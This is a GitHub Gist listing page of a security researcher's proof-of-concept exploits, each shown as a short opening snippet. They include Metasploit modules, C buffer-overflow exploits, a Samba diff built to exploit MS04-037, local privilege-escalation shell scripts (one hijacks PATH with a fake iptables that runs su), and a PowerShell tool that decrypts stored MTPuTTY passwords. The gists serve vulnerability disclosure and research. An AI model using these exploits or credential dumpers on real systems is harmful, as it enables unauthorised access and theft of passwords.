Skip to content

Instantly share code, notes, and snippets.

Yorick Koster ykoster

Block or report user

Report or block ykoster

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ykoster
ykoster / ms12_025_dotnet_encoderparameter.rb
Created Oct 7, 2019
.NET Framework EncoderParameter integer overflow vulnerability - proof of concept
View ms12_025_dotnet_encoderparameter.rb
##
# run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache
##
require 'msf/core'
require 'base64'
require 'digest/sha1'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
@ykoster
ykoster / EMFexp.c
Created Oct 7, 2019
Enhanced Meta File arbitrary memory access vulnerability - proof of concept
View EMFexp.c
/* -----------------------------------------------------------------------------
* Enhanced Meta File arbitrary memory access vulnerability
* Revision 0.1, Yorick Koster, November 5th, 2004
* -----------------------------------------------------------------------------
* Summary:
* ---------
* An memory access flaw has been discovered in the
* GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash
* programs that call this function. Furthermore, it is also possible to copy
* arbitrary parts of memory into a buffer that is passed to the
@ykoster
ykoster / EudoraBoF.c
Created Oct 7, 2019
Eudora 5.2.1 buffer overflow through overly long attachment filename - proof of concept
View EudoraBoF.c
/*
* Summary : Eudora 5.2.1 has a remotely exploitable buffer overflow
* This vulnerability can be exploited by spoofing an attachment
* that has an overly long filename. An overly long filename will
* cause ECX to be overwritten, this value is later used in EIP,
* thus allowing the execution of arbitrary code.
* Note that the filename must begin with a backslash character
* in order to trigger the buffer overflow. Dot characters are
* not needed, but will trigger the buffer overflow sooner
*
@ykoster
ykoster / parse_srv.c.diff
Created Oct 7, 2019
MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
View parse_srv.c.diff
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
#undef DBGC_CLASS
#define DBGC_CLASS DBGC_RPC_PARSE
+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004
@ykoster
ykoster / pa_race.sh
Created Oct 1, 2019
PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
View pa_race.sh
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
@ykoster
ykoster / evolution_tnef_plugin_multil.rb
Created Oct 1, 2019
yTNEF/Evolution TNEF Attachment decoder plugin directory traversal & buffer overflow vulnerabilities - proof of concept (https://www.akitasecurity.nl/advisory/AK20090601/ytnef_evolution_tnef_plugin_traversal___overflow_vulnerabilities.html)
View evolution_tnef_plugin_multil.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
'Description' => %q{
@ykoster
ykoster / Invoke-MTPuTTYConfigDump.psm1
Last active Sep 23, 2019
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
View Invoke-MTPuTTYConfigDump.psm1
<#
.Synopsis
Decrypt an MTPuTTY configuration file
.Description
Read an MTPuTTY configuration file, decrypt the passwords and dump the result
.Parameter ConfigFile
Path to the MTPuTTY configuration file
@ykoster
ykoster / mordan.c
Created Jun 4, 2019
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
View mordan.c
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
@ykoster
ykoster / gotroot.sh
Created Mar 31, 2019
IBM Trusted Key Entry (TKE) workstation local privilege escalation
View gotroot.sh
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
@ykoster
ykoster / SonosController.ps1
Last active Apr 3, 2019
Sonos Controller for Windows ShareConfig.xml weak file permissions
View SonosController.ps1
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
You can’t perform that action at this time.